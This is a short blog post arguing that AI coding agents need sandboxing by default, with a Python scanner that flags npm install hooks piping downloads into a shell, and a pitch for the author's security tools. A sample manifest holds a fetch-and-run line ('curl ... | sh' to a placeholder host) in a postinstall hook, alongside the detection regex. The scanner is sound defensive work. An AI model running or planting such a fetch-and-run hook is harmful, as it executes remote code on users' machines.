# Security Is the Default, Not the Flag

*April 2026*

Last Tuesday, the axios supply chain attack hit. An agent running with `--dangerously-skip-permissions` on someone's host machine executed `curl | sh` from a compromised dependency.

This is not theoretical. This is happening now.
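As an added example (not part of this post or of letai's tooling), a small defensive check that inspects dependency `package.json` lifecycle scripts for a download piped straight into a shell, the pattern the incident above describes. The manifests are constructed samples; the hook names are npm's standard lifecycle hooks.

```python
import json
import re
from typing import Dict, List

# Lifecycle hooks that npm runs automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# A downloader (curl/wget) whose output is fed into a shell, optionally via sudo.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(sh|bash|zsh)\b")


def find_pipe_to_shell(manifests: Dict[str, str]) -> List[dict]:
    """Return one finding per lifecycle script that pipes a download into a shell.

    `manifests` maps a package path (e.g. node_modules/foo/package.json) to the
    raw JSON text, so the scan runs offline over constructed input. A manifest
    that does not parse is reported too, since it cannot be vetted."""
    findings = []
    for path, raw in manifests.items():
        try:
            scripts = json.loads(raw).get("scripts", {})
        except json.JSONDecodeError:
            findings.append({"path": path, "hook": None, "command": None,
                             "reason": "unparseable package.json"})
            continue
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if isinstance(cmd, str) and PIPE_TO_SHELL.search(cmd):
                findings.append({"path": path, "hook": hook, "command": cmd,
                                 "reason": "download piped into a shell"})
    return findings


# Constructed sample manifests (not real packages): one benign build step, one
# hook that pipes a download into a shell, one that only downloads a file.
SAMPLE_MANIFESTS = {
    "node_modules/good-lib/package.json": json.dumps(
        {"name": "good-lib", "scripts": {"postinstall": "node scripts/build.js"}}),
    "node_modules/compromised-lib/package.json": json.dumps(
        {"name": "compromised-lib",
         "scripts": {"postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"}}),
    "node_modules/fetch-only/package.json": json.dumps(
        {"name": "fetch-only",
         "scripts": {"postinstall": "curl -o model.bin https://example.invalid/m.bin"}}),
}

if __name__ == "__main__":
    for f in find_pipe_to_shell(SAMPLE_MANIFESTS):
        print(f"{f['path']} [{f['hook']}]: {f['reason']}: {f['command']}")
```

Such a scan is a cheap pre-install gate; it does not replace the VM isolation and egress restrictions described below, it only catches the crudest form of the payload.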

The industry norm for AI coding agents is: give it full disk access, full network access, full shell access, and hope for the best. The "security" option is a flag you have to remember to set.

We think that's backwards.

## Our approach

**letai** runs every agent in an isolated VM. Network is hardened by default — only ports 443, 22, and 53 are open. You can add domain allowlists. Each task gets its own git branch. The agent can't touch main.

**IntentLink** catches drift before it ships. The LLM compiles your intent; deterministic tools verify that the implementation matches. It runs in CI.

**Vibe of Home** catalogs the vulnerabilities that vibe coding introduces — patterns not in existing CVE databases.

Security shouldn't be opt-in. It should be the starting point.

---

*— Luisa*